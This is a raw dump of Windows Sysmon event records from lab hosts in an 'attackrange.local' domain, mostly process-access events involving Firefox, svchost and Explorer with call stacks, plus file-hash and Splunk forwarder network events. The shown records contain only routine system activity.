Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051413Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:59.124{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051412Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:59.119{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+27c3fa8|C:\Program Files\Mozilla Firefox\xul.dll+27b52ec|C:\Program Files\Mozilla Firefox\xul.dll+bfe491|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32|C:\Program Files\Mozilla Firefox\xul.dll+c007d9 10341000x80000000000000001051411Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:59.118{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+3a4121|C:\Program Files\Mozilla Firefox\xul.dll+3a3ca4|C:\Program Files\Mozilla Firefox\xul.dll+3a3b48|C:\Program Files\Mozilla Firefox\xul.dll+27c3fa8|C:\Program Files\Mozilla Firefox\xul.dll+27b52ec|C:\Program Files\Mozilla Firefox\xul.dll+bfe491|C:\Program Files\Mozilla Firefox\xul.dll+27ac2ad|C:\Program Files\Mozilla Firefox\xul.dll+c057d6|C:\Program Files\Mozilla Firefox\xul.dll+bfe95b|C:\Program Files\Mozilla Firefox\xul.dll+39647b|C:\Program Files\Mozilla Firefox\xul.dll+c00578|C:\Program Files\Mozilla Firefox\xul.dll+27ad51e|C:\Program Files\Mozilla Firefox\xul.dll+27ad2b4|C:\Program Files\Mozilla Firefox\xul.dll+c06a32|C:\Program Files\Mozilla Firefox\xul.dll+c007d9 10341000x80000000000000001051410Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:59.085{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051409Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:59.084{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000979884Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:17:00.865{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCFF9111E7F95835C6509F02ADD7D1DA,SHA256=5ECF12EF303B5A37EB682B762B012484CE578AD43CE2FB1B9E0B27428DA53B1A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051453Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.788{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051452Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.788{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051451Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.639{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0B97267CED039826F378B24F16E7CA0,SHA256=04AC09839B261B6655CD5D0A42EB81555E0CB802EFB9C1CEF2E5AC2B76CDA573,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051450Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.601{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\jju9qh5l.default-release\cache2\doomed\6311MD5=D3EA5536FE6D820D373FD1D3B4E8346E,SHA256=908A6396F9EAA2AA31FDBD6856B1F35F85CD638F36E417F6D20F4A76D1E3A2C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051449Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.565{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\permissions.sqlite-journalMD5=C8D764D59EBAF40CB6A6D4486F3D0424,SHA256=29E95AAFEE61F0E3DE98CEA53D66BF4D101A4D60B7E8170AA74552AD1462EB02,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051448Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:16:58.858{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53453-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001051447Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.253{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051446Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.253{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051445Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.253{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051444Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.253{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051443Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.253{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051442Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.253{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051441Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.253{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051440Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.253{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051439Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.253{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051438Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.253{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051437Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.253{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051436Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051435Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051434Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051433Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051432Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051431Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051430Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051429Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:17:00.252{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051428Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 